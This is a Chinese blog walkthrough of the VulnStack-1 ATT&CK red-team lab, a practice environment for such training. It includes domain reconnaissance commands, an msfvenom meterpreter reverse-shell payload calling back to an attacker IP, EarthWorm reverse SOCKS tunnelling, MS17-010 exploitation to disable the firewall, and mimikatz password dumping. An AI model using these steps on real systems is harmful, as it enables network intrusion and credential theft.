ATT&CK红队评估实战内网靶场(一) VulnStack-1

ATT&CK红队评估实战内网靶场(一) VulnStack-1


前言

Onebug.org | 安全防线
ATT&CK红队评估实战内网靶场(一) VulnStack-1

参考网址:https://www.onebug.org/vulnstudy/99041.html
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019:
在这里插入图片描述

一、win 7

webshell
win7主机下有phpstudy需要自己启动。如有启动报错请重启主机。

result of dirsearch

/yxcms

/phpmyAdmin

/phpMyAdmin

教训:好字典的重要性,要死就是没找到合适的字典,算了 直接将yxcms加到字典里吧www

1.yxcms

访问 yxcms
在右下角form中有提示

/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。

访问后台
http://192.168.21.145/yxcms/index.php?r=admin
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

二、信息收集

信息收集
发现Antwork 在返回信息时,有时会BUG

基本点

1.本机信息收集

在这里插入图片描述
在这里插入图片描述

2.域信息收集

whoami /all 查询域SID
net user test1 /domain 查询当前指定账户的详细信息
net config workstation 查询当前登录域及登录用户信息
net time /domain
一般会有三种情况:
存在域,但当前用户不是域用户,提示说明权限不够

存在域,并且当前用户是域用户

当前网络环境为工作组,不存在域

net group “Domain Controllers” /domain 查找域控
也可以采用 WMIC脚本来收集

http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

探测域内其他主机
这里使用arp扫描 和nbtscan来收集域内信息

arp-scan_64.exe -t 192.168.52.1/20 >1.txt
Reply that 00:0C:29:86:6F:BA is 192.168.52.138 in 15.289000
Reply that 00:0C:29:2A:99:BC is 192.168.52.141 in 16.001900
Reply that 00:0C:29:A3:B3:2A is 192.168.52.143 in 0.040600
Reply that 00:0C:29:A3:B3:2A is 192.168.52.255 in 0.048100

C:\tmp> nbtscan-1.0.35.exe 192.168.52.0/24 >z.txt*timeout (normal end of scan)
192.168.52.138 GOD\OWA
SHARING DC192.168.52.141 GOD\ROOT-TVI862UBEH
SHARING192.168.52.143 GOD\STU1 SHARING
在这里插入图片描述

三、关闭防火墙

1.进入内网

制作木马后门
#kalimsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.21.129 lport=23333 -f exe > /root/Desktop/reverse_tcp.exe
将木马上传到win7并执行。
在这里插入图片描述

2.代理

但为了kali 能直接访问内网,我们还需开启代理
祭出 橙色神器 Earthworm
https://bbs.ichunqiu.com/thread-36219-1-2.html
反弹 SOCKS v5 服务器

同样需要先上传ew_for_Win.exe到边界机

kali
修改proxychains文件

文件地址 /etc/proxychains.conf

修改为

[ProxyList]# 
add proxy here ...# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
#socks5 192.168.21.144 1080
socks5 127.0.0.1 1080
监听1080端口

./ew_for_linux64 -s rcsocks -l 1080 -e 8888
win7
ew_for_Win.exe -s rssocks -d 192.168.21.129 -e 8888

在这里插入图片描述
代理msf

设置proxychains 配置文件
编辑 /etc/proxychains.conf文件
添加一条代理记录
在这里插入图片描述
在这里插入图片描述

3.ms17-010

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

scan
在这里插入图片描述
先使用ms17010命令执行 关闭防火墙,否则无法弹回shell
在这里插入图片描述
执行成功
在这里插入图片描述

4.mimikatz

之后可以利用mimikatz来获取密码

r8要先登录,能正常使用
在这里插入图片描述
exploit – success
在这里插入图片描述

四、我的公众号

后续操作请持续关注哦!!!
了解更多请关注下列公众号:

😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值